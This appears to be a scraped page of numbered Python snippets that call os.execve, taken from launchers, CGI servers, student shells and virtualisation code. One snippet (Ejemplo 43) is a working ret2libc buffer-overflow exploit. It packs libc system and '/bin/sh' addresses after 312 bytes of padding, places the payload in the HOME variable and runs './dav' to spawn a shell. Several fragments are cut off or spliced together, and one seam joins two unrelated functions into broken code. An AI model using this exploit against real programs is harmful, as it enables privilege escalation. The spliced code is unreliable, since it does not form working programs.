        nics: Interfaces to include by jsrun.
        env: Environment dictionary to use for running jsrun.
        command: Command and arguments to run as a list of string.
        stdout: Stdout of the mpi process.
                Only used when settings.run_func_mode is True.
        stderr: Stderr of the mpi process.
                Only used when settings.run_func_mode is True.
    """
    mpi_impl_flags, _ = _get_mpi_implementation_flags(settings.tcp_flag)
    if mpi_impl_flags is None:
        raise Exception(_MPI_NOT_FOUND_ERROR_MSG)

    if not is_jsrun_installed():
        raise Exception(
            'horovod does not find the jsrun command.\n\n'
            'Please, make sure you are running on a cluster with jsrun installed or '
            'use one of the other launchers.')

    if nics and 'NCCL_SOCKET_IFNAME' not in env:
        env['NCCL_SOCKET_IFNAME'] = ','.join(nics)

    smpiargs = ' '.join(mpi_impl_flags)
    if settings.extra_mpi_args:
        smpiargs += ' ' + settings.extra_mpi_args

    if settings.binding_args:
        binding_args = settings.binding_args
    else:
        rf = generate_jsrun_rankfile(settings)
        if settings.verbose >= 2:
            safe_shell_exec.execute('cat {rf}'.format(rf=rf))
        binding_args = '--erf_input {rf}'.format(rf=rf)

    jsrun_command = (
        'jsrun {binding_args} '
        '{output_filename_arg} '
        '{smpiargs} '
        '{command}'.format(
            binding_args=binding_args,
            output_filename_arg='--stdio_stderr {file} --stdio_stdout {file}'.
            format(file=settings.output_filename)
            if settings.output_filename else '',
            smpiargs='--smpiargs {args}'.format(
                args=quote(smpiargs)) if smpiargs else '',
            command=' '.join(quote(par) for par in command)))

    if settings.verbose >= 2:
        print(jsrun_command)

    # Execute the jsrun command.
    if settings.run_func_mode:
        exit_code = safe_shell_exec.execute(jsrun_command,
                                            env=env,
                                            stdout=stdout,
                                            stderr=stderr)
        if exit_code != 0:
            raise RuntimeError(
                "jsrun failed with exit code {exit_code}".format(
                    exit_code=exit_code))
    else:
        os.execve('/bin/sh', ['/bin/sh', '-c', jsrun_command], env)
Ejemplo n.º 33
0
def do_child(executable, args, env):
    os.execve(executable, [executable] + args, env)
Ejemplo n.º 34
0
#!/usr/bin/pypy
# This file is meant as an executable script for running applets.
# BuildApplet will use it as the main executable in the .app bundle if
# we are not running in a framework build.

from warnings import warnpy3k
warnpy3k("In 3.x, the appletrunner module is removed.", stacklevel=2)

import os
import sys
for name in [
        "__rawmain__.py", "__rawmain__.pyc", "__main__.py", "__main__.pyc"
]:
    realmain = os.path.join(os.path.dirname(os.path.dirname(sys.argv[0])),
                            "Resources", name)
    if os.path.exists(realmain):
        break
else:
    sys.stderr.write("%s: cannot find applet main program\n" % sys.argv[0])
    sys.exit(1)
sys.argv.insert(1, realmain)
os.execve(sys.executable, sys.argv, os.environ)
Ejemplo n.º 35
0
 def execve():
     os.execve(args[0], args, os.environ)
Ejemplo n.º 36
0
 def exec_(self, *args, **kwargs):
     background = kwargs.pop('background', None)
     cmd, env = self.prepare_command(*args, **kwargs)
     if background:
         utils.daemonize()
     os.execve(cmd[0], cmd, env)
Ejemplo n.º 37
0
def main(main_name):
    """The main entry point to the bootstrapper. Call this with the module name to
  use as your main app."""
    if sys.platform == 'darwin':
        if ('--curses' in sys.argv):
            sys.argv.insert(1, '--main-name')
            sys.argv.insert(2, main_name)
            sys.exit(run())

        if ('--objc' in sys.argv) and ('--triedenv'
                                       not in sys.argv) and ('--triedarch'
                                                             not in sys.argv):
            import bootstrap_objc
            bootstrap_objc.try_to_exec_stub(main_name)

        # To use wx-widgets on darwin, we need to be in 32 bit mode. Import of wx
        # will fail if you run python in 64 bit mode, which is default in 10.6+. :'(
        # It is depressingly hard to force python into 32 bit mode reliably across
        # computers, for some reason. So, we try two approaches known to work... one
        # after the other.
        wx_found_but_failed = False
        try:
            import wx
        except ImportError:
            if str(sys.exc_value).find("no appropriate 64-bit"):
                wx_found_but_failed = True

        if wx_found_but_failed:
            # try using the versioner trick
            if '--triedenv' not in sys.argv:
                os.putenv('VERSIONER_PYTHON_PREFER_32_BIT', 'yes')
                args = [sys.executable, sys.argv[0], '--triedenv']
                args.extend(sys.argv[1:])
                os.execve(args[0], args, os.environ)

            # last chance...
            if '--triedarch' not in sys.argv:
                args = [
                    "/usr/bin/arch", "-i386", sys.executable, sys.argv[0],
                    '--triedarch'
                ]
                args.extend(sys.argv[1:])
                os.execv(args[0], args)

            # did we already try one of the tricks below? Bail out to prevent recursion...
            print "Your system's python is 64 bit, and all the tricks we know to get it into 32b mode failed."
            sys.exit(255)

        else:
            try:
                sys.argv.remove('--triedenv')
            except:
                pass
            try:
                sys.argv.remove('--triedarch')
            except:
                pass
            sys.argv.insert(1, '--main-name')
            sys.argv.insert(2, main_name)
            sys.exit(run())

    else:
        sys.argv.insert(1, '--main-name')
        sys.argv.insert(2, main_name)
        sys.exit(run())
Ejemplo n.º 38
0
# See https://docs.python.org/3/library/os.html
cmd = "ls -l"
os.system(cmd)  # Noncompliant
mode = os.P_WAIT
file = "ls"
path = "/bin/ls"
env = os.environ
os.spawnl(mode, path, *params)  # Noncompliant
os.spawnle(mode, path, *params, env)  # Noncompliant
os.spawnlp(mode, file, *params)  # Noncompliant
os.spawnlpe(mode, file, *params, env)  # Noncompliant
os.spawnv(mode, path, params)  # Noncompliant
os.spawnve(mode, path, params, env)  # Noncompliant
os.spawnvp(mode, file, params)  # Noncompliant
os.spawnvpe(mode, file, params, env)  # Noncompliant
mode = 'r'
(child_stdout) = os.popen(cmd, mode, 1)  # Noncompliant

# print(child_stdout.read())
(_, output) = subprocess.getstatusoutput(cmd)  # Noncompliant
out = subprocess.getoutput(cmd)  # Noncompliant
os.startfile(path)  # Noncompliant
os.execl(path, *params)  # Noncompliant
os.execle(path, *params, env)  # Noncompliant
os.execlp(file, *params)  # Noncompliant
os.execlpe(file, *params, env)  # Noncompliant
os.execv(path, params)  # Noncompliant
os.execve(path, params, env)  # Noncompliant
os.execvp(file, params)  # Noncompliant
os.execvpe(file, params, env)  # Noncompliant
Ejemplo n.º 39
0
    def run_cgi(self):
        """Execute a CGI script."""
        dir, rest = self.cgi_info
        i = rest.rfind('?')
        if i >= 0:
            rest, query = rest[:i], rest[i+1:]
        else:
            query = ''
        i = rest.find('/')
        if i >= 0:
            script, rest = rest[:i], rest[i:]
        else:
            script, rest = rest, ''
        scriptname = dir + '/' + script
        scriptfile = self.translate_path(scriptname)
        if not os.path.exists(scriptfile):
            self.send_error(404, "No such CGI script (%s)" % `scriptname`)
            return
        if not os.path.isfile(scriptfile):
            self.send_error(403, "CGI script is not a plain file (%s)" %
                            `scriptname`)
            return
        ispy = self.is_python(scriptname)
        if not ispy:
            if not (self.have_fork or self.have_popen2 or self.have_popen3):
                self.send_error(403, "CGI script is not a Python script (%s)" %
                                `scriptname`)
                return
            if not self.is_executable(scriptfile):
                self.send_error(403, "CGI script is not executable (%s)" %
                                `scriptname`)
                return

        # Reference: http://hoohoo.ncsa.uiuc.edu/cgi/env.html
        # XXX Much of the following could be prepared ahead of time!
        env = {}
        env['SERVER_SOFTWARE'] = self.version_string()
        env['SERVER_NAME'] = self.server.server_name
        env['GATEWAY_INTERFACE'] = 'CGI/1.1'
        env['SERVER_PROTOCOL'] = self.protocol_version
        env['SERVER_PORT'] = str(self.server.server_port)
        env['REQUEST_METHOD'] = self.command
        uqrest = urllib.unquote(rest)
        env['PATH_INFO'] = uqrest
        env['PATH_TRANSLATED'] = self.translate_path(uqrest)
        env['SCRIPT_NAME'] = scriptname
        if query:
            env['QUERY_STRING'] = query
        host = self.address_string()
        if host != self.client_address[0]:
            env['REMOTE_HOST'] = host
        env['REMOTE_ADDR'] = self.client_address[0]
        # XXX AUTH_TYPE
        # XXX REMOTE_USER
        # XXX REMOTE_IDENT
        if self.headers.typeheader is None:
            env['CONTENT_TYPE'] = self.headers.type
        else:
            env['CONTENT_TYPE'] = self.headers.typeheader
        length = self.headers.getheader('content-length')
        if length:
            env['CONTENT_LENGTH'] = length
        accept = []
        for line in self.headers.getallmatchingheaders('accept'):
            if line[:1] in "\t\n\r ":
                accept.append(line.strip())
            else:
                accept = accept + line[7:].split(',')
        env['HTTP_ACCEPT'] = ','.join(accept)
        ua = self.headers.getheader('user-agent')
        if ua:
            env['HTTP_USER_AGENT'] = ua
        co = filter(None, self.headers.getheaders('cookie'))
        if co:
            env['HTTP_COOKIE'] = ', '.join(co)
        # XXX Other HTTP_* headers
        if not self.have_fork:
            # Since we're setting the env in the parent, provide empty
            # values to override previously set values
            for k in ('QUERY_STRING', 'REMOTE_HOST', 'CONTENT_LENGTH',
                      'HTTP_USER_AGENT', 'HTTP_COOKIE'):
                env.setdefault(k, "")
        os.environ.update(env)

        self.send_response(200, "Script output follows")

        decoded_query = query.replace('+', ' ')

        if self.have_fork:
            # Unix -- fork as we should
            args = [script]
            if '=' not in decoded_query:
                args.append(decoded_query)
            nobody = nobody_uid()
            self.wfile.flush() # Always flush before forking
            pid = os.fork()
            if pid != 0:
                # Parent
                pid, sts = os.waitpid(pid, 0)
                # throw away additional data [see bug #427345]
                while select.select([self.rfile], [], [], 0)[0]:
                    if not self.rfile.read(1):
                        break
                if sts:
                    self.log_error("CGI script exit status %#x", sts)
                return
            # Child
            try:
                try:
                    os.setuid(nobody)
                except os.error:
                    pass
                os.dup2(self.rfile.fileno(), 0)
                os.dup2(self.wfile.fileno(), 1)
                os.execve(scriptfile, args, os.environ)
            except:
                self.server.handle_error(self.request, self.client_address)
                os._exit(127)

        elif self.have_popen2 or self.have_popen3:
            # Windows -- use popen2 or popen3 to create a subprocess
            import shutil
            if self.have_popen3:
                popenx = os.popen3
            else:
                popenx = os.popen2
            cmdline = scriptfile
            if self.is_python(scriptfile):
                interp = sys.executable
                if interp.lower().endswith("w.exe"):
                    # On Windows, use python.exe, not pythonw.exe
                    interp = interp[:-5] + interp[-4:]
                cmdline = "%s -u %s" % (interp, cmdline)
            if '=' not in query and '"' not in query:
                cmdline = '%s "%s"' % (cmdline, query)
            self.log_message("command: %s", cmdline)
            try:
                nbytes = int(length)
            except (TypeError, ValueError):
                nbytes = 0
            files = popenx(cmdline, 'b')
            fi = files[0]
            fo = files[1]
            if self.have_popen3:
                fe = files[2]
            if self.command.lower() == "post" and nbytes > 0:
                data = self.rfile.read(nbytes)
                fi.write(data)
            # throw away additional data [see bug #427345]
            while select.select([self.rfile._sock], [], [], 0)[0]:
                if not self.rfile._sock.recv(1):
                    break
            fi.close()
            shutil.copyfileobj(fo, self.wfile)
            if self.have_popen3:
                errors = fe.read()
                fe.close()
                if errors:
                    self.log_error('%s', errors)
            sts = fo.close()
            if sts:
                self.log_error("CGI script exit status %#x", sts)
            else:
                self.log_message("CGI script exited OK")

        else:
            # Other O.S. -- execute script in this process
            save_argv = sys.argv
            save_stdin = sys.stdin
            save_stdout = sys.stdout
            save_stderr = sys.stderr
            try:
                try:
                    sys.argv = [scriptfile]
                    if '=' not in decoded_query:
                        sys.argv.append(decoded_query)
                    sys.stdout = self.wfile
                    sys.stdin = self.rfile
                    execfile(scriptfile, {"__name__": "__main__"})
                finally:
                    sys.argv = save_argv
                    sys.stdin = save_stdin
                    sys.stdout = save_stdout
                    sys.stderr = save_stderr
            except SystemExit, sts:
                self.log_error("CGI script exit status %s", str(sts))
            else:
            pass
            os.write(2, ("Error: File not found...").encode())

    else:
        rc = os.fork()  #forks a child process

        if rc < 0:
            os.write(2, ("Fork failed %d\n" % rc).encode())
            sys.exit(1)

        elif rc == 0:
            if '|' in args:
                pipe(args)
            if '>' in args:
                out_redir(args)
            elif '<' in args:
                in_redir(args)
            else:
                for dir in re.split(":",
                                    os.environ['PATH']):  #try each directory
                    program = "%s/%s" % (dir, args[0])
                    try:
                        os.execve(program, args,
                                  os.environ)  #try to execute program
                    except FileNotFoundError:
                        pass
                os.write(2, ("Command not found\n").encode())
                sys.exit(1)
        else:
            child_pid = os.wait()  #waiting for child to finish
Ejemplo n.º 41
0
    if not l:
        break
    k, v = l.split(b"=", maxsplit=1)
    env[k] = v

ESC = '\033[{0}m'
esc = ESC.format

OFF, BOLD, UNDERSCORE, BLINK = 0, 1, 4, 5
BLACK, BLACKBG = 30, 40
RED, REDBG = 31, 41
GREEN, GREENBG = 32, 42
YELLOW, YELLOWBG = 33, 43
BLUE, BLUEBG = 34, 44
MAGENTA, MAGENTABG = 35, 45
CYAN, CYANBG = 36, 46
WHITE, WHITEBG = 37, 47

newps1 = "{loud}<aws-vault env {env}>{quiet} {ps1}".format(
    loud=esc(MAGENTABG) + esc(BLACK),
    quiet=esc(OFF),
    env=vaultenv,
    ps1=env.get("PS1", "$"))
args = ()
if shtype == "bash":
    env["PROMPT_COMMAND"] = 'PS1="{newps1}";unset PROMPT_COMMAND'.format(
        newps1=newps1)
elif shtype == "zsh":
    pass
os.execve(sh, args, env)
Ejemplo n.º 42
0
def run():
    args = parse_args()

    if args.version:
        print(horovod.__version__)
        exit(0)

    if args.host:
        all_host_names = [
            x for x in [y.split(':')[0] for y in args.host.split(',')]
        ]
    else:
        all_host_names = []

    # horovodrun has to finish all the checks before this timeout runs out.
    if args.start_timeout:
        start_timeout = args.start_timeout
    else:
        # Lookup default timeout from the environment variable.
        start_timeout = int(os.getenv('HOROVOD_START_TIMEOUT', '600'))

    settings = hvd_settings.Settings(verbose=args.verbose,
                                     ssh_port=args.ssh_port,
                                     key=secret.make_secret_key(),
                                     timeout=timeout.Timeout(start_timeout),
                                     num_hosts=len(all_host_names),
                                     num_proc=args.np)

    # This cache stores the results of checks performed by horovodrun
    # during the initialization step. It can be disabled by setting
    # --disable-cache flag.
    fn_cache = None
    if not args.disable_cache:
        params = ''
        if args.np:
            params += str(args.np) + ' '
        if args.host:
            params += str(args.host) + ' '
        if args.ssh_port:
            params += str(args.ssh_port)
        parameters_hash = hashlib.md5(params.encode('utf-8')).hexdigest()
        fn_cache = cache.Cache(CACHE_FOLDER, CACHE_STALENESS_THRESHOLD_MINUTES,
                               parameters_hash)

    remote_host_names = []
    if args.host:
        if settings.verbose >= 1:
            print("Filtering local host names.")
        remote_host_names = network.filter_local_addresses(all_host_names)

        if len(remote_host_names) > 0:
            if settings.verbose >= 1:
                print("Checking ssh on all remote hosts.")
            # Check if we can ssh into all remote hosts successfully.
            _check_all_hosts_ssh_successful(remote_host_names,
                                            args.ssh_port,
                                            fn_cache=fn_cache)
            if settings.verbose >= 1:
                print("SSH was successful into all the remote hosts.")

        hosts_arg = "-H {hosts}".format(hosts=args.host)
    else:
        # if user does not specify any hosts, mpirun by default uses local host.
        # There is no need to specify localhost.
        hosts_arg = ""

    if args.host and len(remote_host_names) > 0:
        if settings.verbose >= 1:
            print("Testing interfaces on all the hosts.")

        local_host_names = set(all_host_names) - set(remote_host_names)
        # Find the set of common, routed interfaces on all the hosts (remote
        # and local) and specify it in the args to be used by NCCL. It is
        # expected that the following function will find at least one interface
        # otherwise, it will raise an exception.
        common_intfs = _driver_fn(all_host_names,
                                  local_host_names,
                                  settings,
                                  fn_cache=fn_cache)

        tcp_intf_arg = "-mca btl_tcp_if_include {common_intfs}".format(
            common_intfs=','.join(common_intfs))
        nccl_socket_intf_arg = "-x NCCL_SOCKET_IFNAME={common_intfs}".format(
            common_intfs=','.join(common_intfs))

        if settings.verbose >= 1:
            print("Interfaces on all the hosts were successfully checked.")
    else:
        # If all the given hosts are local, no need to specify the interfaces
        # because MPI does not use network for local execution.
        tcp_intf_arg = ""
        nccl_socket_intf_arg = ""

    # Pass all the env variables to the mpirun command.
    env = os.environ.copy()

    # Pass secret key through the environment variables.
    env[secret.HOROVOD_SECRET_KEY] = codec.dumps_base64(settings.key)

    if not _is_open_mpi_installed():
        raise Exception(
            'horovodrun convenience script currently only supports '
            'Open MPI.\n\n'
            'Choose one of:\n'
            '1. Install Open MPI 4.0.0+ and re-install Horovod '
            '(use --no-cache-dir pip option).\n'
            '2. Run distributed '
            'training script using the standard way provided by your'
            ' MPI distribution (usually mpirun, srun, or jsrun).')

    if args.ssh_port:
        ssh_port_arg = "-mca plm_rsh_args \"-p {ssh_port}\"".format(
            ssh_port=args.ssh_port)
    else:
        ssh_port_arg = ""

    mpirun_command = (
        'mpirun --allow-run-as-root --tag-output '
        '-np {num_proc} {hosts_arg} '
        '-bind-to none -map-by slot '
        '-mca pml ob1 -mca btl ^openib '
        '{ssh_port_arg} '
        '{tcp_intf_arg} '
        '-x NCCL_DEBUG=INFO '
        '{nccl_socket_intf_arg} '
        '{env} {command}'  # expect a lot of environment variables
        .format(num_proc=settings.num_proc,
                hosts_arg=hosts_arg,
                tcp_intf_arg=tcp_intf_arg,
                nccl_socket_intf_arg=nccl_socket_intf_arg,
                ssh_port_arg=ssh_port_arg,
                env=' '.join('-x %s' % key for key in env.keys()
                             if env_util.is_exportable(key)),
                command=' '.join(quote(par) for par in args.command)))

    if settings.verbose >= 1:
        print(mpirun_command)
    # Execute the mpirun command.
    os.execve('/bin/sh', ['/bin/sh', '-c', mpirun_command], env)
Ejemplo n.º 43
0
libc_system = pack("<I", 0xf7db79e0)
libc_binsh = pack("<I", 0xf7ef7aaa)
libc_exit = pack("<I", 0xf7daaa60)
libc_printf = pack("<I", 0xf7dcb860)
libc_popret = pack("<I", 0xf7e76671)
ret = pack("<I", 0x804900a)
rop_popret = pack("<I", 0x804901e)

buffer = ''
buffer += "A" * 312
# system("/bin/sh")
buffer += libc_system
buffer += libc_popret
buffer += libc_binsh

buffer += rop_popret

# printf("/bin/sh")
buffer += libc_printf
buffer += libc_popret
buffer += libc_binsh

# exit()
buffer += libc_exit
buffer += ret

PROGNAME = "./dav"
os.environ['HOME'] = buffer
os.execve(PROGNAME, [PROGNAME], os.environ)
Ejemplo n.º 44
0
def child(args):
    pid: int = os.getpid()

    if '>' in args:  # Redirect the output. Reference: p4-redirect.py; see README
        os.close(1)
        sys.stdout = open(args[args.index('>') + 1], "w")
        fd = sys.stdout.fileno()
        os.set_inheritable(fd, True)
        args.remove(args[args.index('>') + 1])
        args.remove('>')

    if '<' in args:
        os.close(0)
        sys.stdin = open(args[args.index('<') + 1], "r")
        fd = sys.stdin.fileno()
        os.set_inheritable(fd, True)
        args.remove('<')

    if '>>' in args:  # basic bash command: append a file in the shell
        os.close(1)
        sys.stdin = open(args[args.index('>>') + 1], "a")
        fd = sys.stdin.fileno()
        os.set_inheritable(fd, True)
        args.remove(args[args.index('>>') + 1])
        args.remove('>>')

    if '&' in args:  # removes the ampersand to kill a process in the shell; speeds up kill
        args.remove('&')

    if '|' in args:  # piping code fragment; see p5-pipe.py and README for reference.
        read, write = os.pipe()

        for i in (read, write):
            os.set_inheritable(i, True)
            os.write(2, ("Pipe: pr=%d pw=%d\n" % (read, write)).encode())
            rc = os.fork()

            if rc < 0:
                os.write(2, "Forking of child has failed.\n".encode())
            if rc == 0:
                pipeTheChild(args, read, write)
            if rc > 0:
                childPid = os.wait()
                os.close(0)
                os.dup(read)
                for fd in (read, write):
                    os.close(fd)

                for inputLine in fileinput.input():
                    os.write(2, ("Pipe child: %s" % inputLine).encode())

    for ch in args[0]:  # searching for a path...
        if '/' in args[0]:
            program = args[0]
            try:
                os.execve(program, args, os.environ)
            except FileNotFoundError:
                pass
            os.write(2, ("Could not execute %s on child: %d \n" %
                         (pid, program)).encode())
            sys.exit(1)

    for directory in re.split(
            ":", os.environ['PATH']
    ):  # No path specified: tries each directory to find the program
        # Reference: p4-redirect.py
        # see README
        program = "%s/%s" % (directory, args[0])  # displays path of program
        try:
            os.execv(program, args)  # runs program
        except FileNotFoundError:
            pass
    os.write(2, ("Child %d: Could not exec %s \n" % (pid, program)).encode())
    sys.exit(1)
Ejemplo n.º 45
0
    def run(self):

        self.shell_pid, master_fd = os.forkpty()
        if self.shell_pid == 0:
            for i in range(3, 1024):
                if i == master_fd:
                    continue
                try:
                    os.close(i)
                except Exception:
                    pass
            os.chdir('/root')
            cmd = [
                '/usr/local/bin/bash'
            ]

            if self.jail is not None:
                cmd = [
                    '/usr/local/bin/iocage',
                    'console',
                    self.jail
                ]
            os.execve(cmd[0], cmd, {
                'TERM': 'xterm',
                'HOME': '/root',
                'LANG': 'en_US.UTF-8',
                'PATH': '/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin:/root/bin',
            })

        def reader():
            """
            Reader thread for reading from pty file descriptor
            and forwarding it to the websocket.
            """
            while True:
                read = os.read(master_fd, 1024)
                if read == b'':
                    break
                asyncio.run_coroutine_threadsafe(
                    self.ws.send_str(read.decode('utf8')), loop=self.loop
                ).result()

        def writer():
            """
            Writer thread for reading from input_queue and write to
            the shell pty file descriptor.
            """
            while True:
                try:
                    get = self.input_queue.get(timeout=1)
                    os.write(master_fd, get)
                except queue.Empty:
                    # If we timeout waiting in input query lets make sure
                    # the shell process is still alive
                    try:
                        os.kill(self.shell_pid, 0)
                    except ProcessLookupError:
                        break

        t_reader = threading.Thread(target=reader, daemon=True)
        t_reader.start()

        t_writer = threading.Thread(target=writer, daemon=True)
        t_writer.start()

        # Wait for shell to exit
        while True:
            try:
                pid, rv = os.waitpid(self.shell_pid, os.WNOHANG)
            except ChildProcessError:
                break
            if self._die:
                return
            if pid <= 0:
                time.sleep(1)

        t_reader.join()
        t_writer.join()
        asyncio.run_coroutine_threadsafe(self.ws.close(), self.loop)
Ejemplo n.º 46
0
]

STRIP_EXEC = "/usr/bin/strip"

#
# We're using a stock interpreter to run the app, yet we need
# a way to pass the Python main program to the interpreter. The
# bootstrapping script fires up the interpreter with the right
# arguments. os.execve() is used as OSX doesn't like us to
# start a real new process. Also, the executable name must match
# the CFBundleExecutable value in the Info.plist, so we lie
# deliberately with argv[0]. The actual Python executable is
# passed in an environment variable so we can "repair"
# sys.executable later.
#
BOOTSTRAP_SCRIPT = """\
#!%(hashbang)s

import sys, os
execdir = os.path.dirname(sys.argv[0])
executable = os.path.join(execdir, "%(executable)s")
resdir = os.path.join(os.path.dirname(execdir), "Resources")
libdir = os.path.join(os.path.dirname(execdir), "Frameworks")
mainprogram = os.path.join(resdir, "%(mainprogram)s")

if %(optimize)s:
    sys.argv.insert(1, '-O')

sys.argv.insert(1, mainprogram)
if %(standalone)s or %(semi_standalone)s:
    os.environ["PYTHONPATH"] = resdir
Ejemplo n.º 47
0
def loop_shell():
	global short
	
	while True:
		if 'PS1' in os.environ:
			os.write(1,(os.environ['PS1']).encode())
			try:
#				inp = os.read(0,256)
#				user_input = inp.decode().split()
				user_input = [str(n) for n in input().split()]
			except EOFError: 
				sys.exit(1)
		else:
			get_short()
			try:
#				inp = os.read(0,256)
#				user_input = inp.decode().split()
				user_input = [str(n) for n in input().split()]
			except EOFError: 
				sys.exit(1)
		w = True
		
		if user_input == '\n':
			loop_shell()
			return
		
		if not user_input:
			loop_shell()
			return
		
		if user_input[0] == 'exit':
			sys.exit(1)
			
		if "cd" in user_input:#changes directory
			try:
				os.chdir(user_input[1])
			except FileNotFoundError:
				os.write(1, ("-bash: cd: %s: No such file or directory\n" % directory).encode())
			
			continue
			
		else:
			rc = os.fork()  
		
			if '&' in user_input:
				user_input.remove("&")
				w = False
				
			if user_input[0] == 'exit':
				quit(1)
				
			if rc < 0:
				os.write(2, ("fork failed, returning %d\n" % rc).encode())
				sys.exit(1)

			elif rc == 0:            
				if user_input[0].startswith("/"):
					try:
						os.execve(user_input[0], user_input, os.environ) # try to exec program
					except FileNotFoundError:
						pass 
				redirect(user_input)
				simple_pipe(user_input)
				execChild(user_input)
				
			else:                      
				if w: #wait
					code = os.wait() 
					if code[1] != 0 and code[1] != 256:
						os.write(2, ("Program terminated with exit code: %d\n" % code[1]).encode())
Ejemplo n.º 48
0
    if (a == None):
        temp = input("$ ")
        print("here 1")

    if (rc < 0):
        print("here 2")
        os.write(2, ("Fork failed, returning %d\n" % rc).encode())
        sys.exit(1)

    if (rc == 0):
        print("here 3")
        os.write(1, ("Child: My pid==%d. Parent's pid=%\n" %
                     (os.getpid(), pID)).encode())
        print("hi")
        args = [temp, "myShell.py"]

        for dir in re.split(":", os.eniron['PATH']):
            print("here 4")
            program = "%s%s" % (dir, args[0])

            os.write(1, ("Child: ...trying to exec %s\n" % program).encode())

            try:
                os.execve(program, args, os.environ)

            except FileNotFoundError:
                pass

        os.write(2, ("Child:  Could not exec %s\n" % args[0].encode()))
        sys.exit(1)
Ejemplo n.º 49
0
    def createDeviceModel(self, restore=False):
        if self.device_model is None:
            return
        if self.pid:
            return
        # Execute device model.
        #todo: Error handling
        args = self.getDeviceModelArgs(restore)
        env = dict(os.environ)
        if self.display:
            env['DISPLAY'] = self.display
        if self.xauthority:
            env['XAUTHORITY'] = self.xauthority
        unique_id = "%i-%i" % (self.vm.getDomid(), time.time())
        sentinel_path = sentinel_path_prefix + unique_id
        sentinel_path_fifo = sentinel_path + '.fifo'
        os.mkfifo(sentinel_path_fifo, 0600)
        sentinel_write = file(sentinel_path_fifo, 'r+')
        self._openSentinel(sentinel_path_fifo)
        self.vm.storeDom("image/device-model-fifo", sentinel_path_fifo)
        xstransact.Mkdir("/local/domain/0/device-model/%i" %
                         self.vm.getDomid())
        xstransact.SetPermissions(
            "/local/domain/0/device-model/%i" % self.vm.getDomid(), {
                'dom': self.vm.getDomid(),
                'read': True,
                'write': True
            })
        log.info("spawning device models: %s %s", self.device_model, args)
        # keep track of pid and spawned options to kill it later

        self.logfile = "/var/log/xen/qemu-dm-%s.log" % str(
            self.vm.info['name_label'])

        # rotate log
        logfile_mode = os.O_WRONLY | os.O_CREAT | os.O_APPEND
        logrotate_count = XendOptions.instance().get_qemu_dm_logrotate_count()
        if logrotate_count > 0:
            logfile_mode |= os.O_TRUNC
            if os.path.exists("%s.%d" % (self.logfile, logrotate_count)):
                os.unlink("%s.%d" % (self.logfile, logrotate_count))
            for n in range(logrotate_count - 1, 0, -1):
                if os.path.exists("%s.%d" % (self.logfile, n)):
                    os.rename("%s.%d" % (self.logfile, n),
                              "%s.%d" % (self.logfile, (n + 1)))
            if os.path.exists(self.logfile):
                os.rename(self.logfile, self.logfile + ".1")

        null = os.open("/dev/null", os.O_RDONLY)
        logfd = os.open(self.logfile, logfile_mode, 0666)

        sys.stderr.flush()
        contract = osdep.prefork("%s:%d" %
                                 (self.vm.getName(), self.vm.getDomid()))
        pid = os.fork()
        if pid == 0:  #child
            try:
                osdep.postfork(contract)
                os.dup2(null, 0)
                os.dup2(logfd, 1)
                os.dup2(logfd, 2)
                oshelp.close_fds((sentinel_write.fileno(), ))
                try:
                    os.execve(self.device_model, args, env)
                except Exception, e:
                    print >> sys.stderr, (
                        'failed to set up fds or execute dm %s: %s' %
                        (self.device_model, utils.exception_string(e)))
                    os._exit(126)
            except:
                os._exit(127)
        else:
            osdep.postfork(contract, abandon=True)
            self.pid = pid
            os.close(null)
            os.close(logfd)
        sentinel_write.close()
        self.vm.storeDom("image/device-model-pid", self.pid)
        log.info("device model pid: %d", self.pid)
        # we would very much prefer not to have a thread here and instead
        #  have a callback but sadly we don't have Twisted in xend
        self.sentinel_thread = thread.start_new_thread(self._sentinel_watch,
                                                       ())
        if self.device_model.find('stubdom-dm') > -1:
            from xen.xend import XendDomain
            domains = XendDomain.instance()
            domains.domains_lock.release()

            count = 0
            while True:
                orig_state = xstransact.Read(
                    "/local/domain/0/device-model/%i/state" %
                    self.vm.getDomid())
                # This can occur right after start-up
                if orig_state != None:
                    break

                log.debug(
                    'createDeviceModel %i: orig_state is None, retrying' %
                    self.vm.getDomid())

                time.sleep(0.1)
                count += 1
                if count > 100:
                    break

            domains.domains_lock.acquire()
Ejemplo n.º 50
0
    Tuple of (flags, rem) where "flags" is a map of key,value flags pairs
    and "rem" is a list that strips the used flags and acts as a new
    replacement for sys.argv.
  """
    parser = argparse.ArgumentParser(add_help=False)
    parser.add_argument('--dev_appserver',
                        default=os.path.join(SDK_BASE, 'dev_appserver.py'))
    namespace, rest = parser.parse_known_args()
    flags = vars(namespace)
    rem = [sys.argv[0]]
    rem.extend(rest)
    return flags, rem


if __name__ == '__main__':
    vals, new_argv = GetArgsAndArgv()
    tool = os.path.basename(__file__)
    bin = os.path.join(GOROOT, 'bin', tool)
    os.environ['GOROOT'] = GOROOT
    os.environ['APPENGINE_DEV_APPSERVER'] = vals['dev_appserver']

    # Remove env variables that may be incompatible with the SDK.
    for e in ('GOARCH', 'GOBIN', 'GOOS'):
        os.environ.pop(e, None)

    # Set a GOPATH if one is not set.
    if not os.environ.get('GOPATH'):
        os.environ['GOPATH'] = os.path.join(SDK_BASE, 'gopath')

    os.execve(bin, new_argv, os.environ)
Ejemplo n.º 51
0
def run(action_id, params, cache_only=None):

    # Setup SIGTERM handler
    sHandler = SignalHandler()
    signal.signal(signal.SIGTERM, sHandler.handle)
    cfg = config.initUp2dateConfig()
    local_config.init('rhncfg-client', defaults=dict(cfg.items()))

    tempfile.tempdir = local_config.get('script_tmp_dir')

    logfile_name = local_config.get('script_log_file')
    log_output = local_config.get('script_log_file_enable')

    if log_output:
        # If we're going to log, make sure we can create the logfile
        _create_path(logfile_name)

    if cache_only:
        return (0, "no-ops for caching", {})

    action_type = 'script.run'
    if not _local_permission_check(action_type):
        return _perm_error(action_type)


    extras = {'output':''}
    script = params.get('script')
    if not script:
        return (1, "No script to execute", {})

    username = params.get('username')
    groupname = params.get('groupname')

    if not username:
        return (1, "No username given to execute script as", {})

    if not groupname:
        return (1, "No groupname given to execute script as", {})

    timeout = params.get('timeout')

    if timeout:
        try:
            timeout = int(timeout)
        except ValueError:
            return (1, "Invalid timeout value", {})
    else:
        timeout = None

    db_now = params.get('now')
    if not db_now:
        return (1, "'now' argument missing", {})
    db_now = time.mktime(time.strptime(db_now, "%Y-%m-%d %H:%M:%S"))

    now = time.time()
    process_start = None
    process_end = None

    child_pid = None

    # determine uid/ugid for script ownership, uid also used for setuid...
    try:
        user_record = pwd.getpwnam(username)
    except KeyError:
        return 1, "No such user %s" % username, extras

    uid = user_record[2]
